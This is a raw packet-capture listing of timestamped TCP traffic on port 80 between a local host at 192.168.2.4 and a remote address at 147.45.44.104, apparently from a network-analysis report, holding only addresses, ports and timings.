Jul 26, 2024 18:56:48.570372105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.571213007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571224928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571235895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571245909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571252108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.571258068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571269989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571275949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.571280956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571295023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571300983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.571307898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571314096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.571321964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.571332932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.571357965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.572096109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572108030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572118044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572128057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572139025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572148085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.572149992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572161913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572170973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.572171926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572180986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.572184086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572196960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.572206020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.572230101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.573056936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573069096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573080063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573091030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573101997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573101997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.573115110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573122025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.573126078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573138952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573146105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.573149920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573162079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.573179960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.573179960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.573194027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.574142933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.574157000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.574167967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.574178934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.574182987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.574198008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.574218035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.574980021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575011015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575021982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575032949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575042963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575042963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.575056076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575064898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.575068951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575078011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.575082064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575093985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575103045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.575105906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575125933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.575150013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.575970888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575983047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.575993061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576004028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576014996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576018095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.576025009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576037884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576046944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.576049089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576062918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576071024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.576076984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.576088905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.576117039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577013969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577025890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577035904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577048063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577058077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577059031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577070951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577079058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577081919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577092886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577102900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577105999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577117920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577127934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577155113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577872038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577883959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577894926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577907085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577915907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577917099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577929020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577935934 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577953100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.577965021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577976942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.577994108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.578008890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.578816891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578830957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578841925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578851938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.578852892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578865051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578876019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578885078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.578886032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578898907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578908920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578917980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.578922033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.578927994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.578949928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.578970909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.579778910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579791069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579802036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579812050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579823017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579834938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579839945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.579849958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579858065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.579863071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579871893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.579875946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579889059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.579899073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.579927921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581058979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581070900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581082106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581094027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581104040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581110001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581115007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581125975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581126928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581140995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581140995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581152916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581165075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581165075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581188917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581204891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581851959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581864119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581873894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581886053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581897974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581898928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581911087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581922054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581922054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581933022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581939936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581945896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581955910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.581963062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.581994057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.582673073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582684994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582695007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582706928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582715988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.582726955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582731009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.582732916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582743883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582750082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582756996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582758904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.582762957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.582783937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.582798004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.583842993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583854914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583864927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583877087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583888054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583895922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.583899975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583913088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583916903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.583926916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583935976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.583939075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583950996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.583950996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.583976984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584000111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584592104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584604025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584631920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584639072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584645987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584656954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584664106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584669113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584681034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584686995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584692001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584703922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584718943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584722042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584733009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.584745884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584759951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.584783077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.585536003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585573912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585582972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585594893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585604906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585608006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.585618019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585628986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585632086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.585642099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585648060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.585653067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585664034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.585664988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.585690022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.585712910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.586493015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586505890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586515903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586525917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586536884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586544991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.586549997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586561918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586569071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.586577892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586585999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.586591005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586601973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.586612940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.586641073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.587539911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587552071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587562084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587573051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587582111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587590933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.587594032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587605953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587605953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.587618113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587621927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.587630033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587641001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587646961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.587651968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.587673903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.587687016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.588177919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588190079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588200092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588210106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588219881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588232040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588233948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.588243008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588254929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588258028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.588264942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588278055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.588279009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.588295937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.588315964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589140892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589154005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589164019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589175940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589185953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589191914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589198112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589209080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589209080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589221001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589224100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589234114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589245081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589251041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589256048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589267969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589277983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589281082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589297056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589312077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.589981079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.589992046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590002060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590013027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590020895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590025902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590038061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590039968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590050936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590061903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590064049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590076923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590078115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590089083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590101004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590101004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590118885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590126991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590143919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590164900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590795994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590809107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590818882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590831041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.590840101 CEST	49757	80	192.168.2.4	147.45.44.104
